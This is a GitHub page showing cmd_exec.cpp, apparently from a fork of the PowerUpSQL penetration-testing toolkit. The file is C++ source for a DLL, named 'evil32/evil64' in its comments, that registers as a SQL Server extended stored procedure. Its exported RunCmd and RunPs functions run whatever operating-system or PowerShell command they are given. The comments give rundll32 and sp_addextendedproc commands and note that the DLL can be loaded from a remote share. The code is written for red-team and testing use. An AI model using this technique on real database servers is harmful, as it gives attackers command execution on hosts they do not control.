forked from NetSPI/PowerUpSQL
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathcmd_exec.cpp
More file actions
69 lines (57 loc) · 2.53 KB
/
cmd_exec.cpp
File metadata and controls
69 lines (57 loc) · 2.53 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
// DllMain.cpp
// Reference: http://stackoverflow.com/questions/12749210/how-to-create-a-simple-dll-for-a-custom-sql-server-extended-stored-procedure
// Note: Compile for 32 and 64
// Manual
// rundll32 evil32.dll,RunCmd
// rundll32 evil32.dll,RunPs
// rundll32 evil64.dll,RunCmd
// rundll32 evil64.dll,RunPs
// Register DLL in SQL Server Examples
// sp_addextendedproc 'RunCmd', 'c:\Temp\evil32.dll';
// sp_addextendedproc 'RunCmd', 'c:\Temp\evil64.dll';
// sp_addextendedproc 'RunPs', 'c:\Temp\evil32.dll';
// sp_addextendedproc 'RunPs', 'c:\Temp\evil64.dll';
// sp_addextendedproc 'RunPs', '\\server\share\evil64.dll'; :) - DLL doesn't need to be hosted on target system's disk
// Run Command Examples
// RunCmd "whoami"
// RunPs "write-output 'Hellow World' | Out-File c:\temp\file.txt"
// Remove Procedures
// sp_dropextendedproc 'RunCmd';
// sp_dropextendedproc 'RunPs';
// Todo: https://technet.microsoft.com/en-us/library/aa197372(v=sql.80).aspx
#include "stdafx.h" //dllmain.cpp : Defines the entry point for the DLL application.
#include "srv.h" //Must get from C:\Program Files (x86)\Microsoft SQL Server\80\Tools\DevTools\Include
#include "shellapi.h" //needed for ShellExecute
#include "string" //needed for std:string
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
system("echo This is a test. > c:\\Temp\\test_dllmain.txt");
return 1;
}
#define RUNCMD_FUNC extern "C" __declspec (dllexport)
RUNCMD_FUNC int __stdcall RunCmd(const char * Command) {
// Run OS command with ShellExecute
ShellExecute(NULL, TEXT("open"), TEXT("cmd"), TEXT(" /C echo This is a test. > c:\\Temp\\test_cmd2.txt"), TEXT(" C:\\ "), SW_SHOW);
// Run OS command with system hard coded
system("echo This is a test. > c:\\Temp\\test_cmd1.txt");
// Run OS command with system hard coded from variable
const char *pdata = "echo This is a test. > c:\\Temp\\test_cmd3.txt";
system(pdata);
// Run OS command with system from arg
system(Command);
return 1;
}
#define RUNPS_FUNC extern "C" __declspec (dllexport)
RUNPS_FUNC int __stdcall RunPs(const char * Command) {
// Run PowerShell command
ShellExecute(NULL, TEXT("open"), TEXT("powershell"), TEXT(" -C \" 'This is a test.'|out-file c:\\temp\\test_ps2.txt \" "), TEXT(" C:\\ "), SW_SHOW);
system("PowerShell -C \"'This is a test.'|out-file c:\\temp\\test_ps1.txt\"");
return 1;
}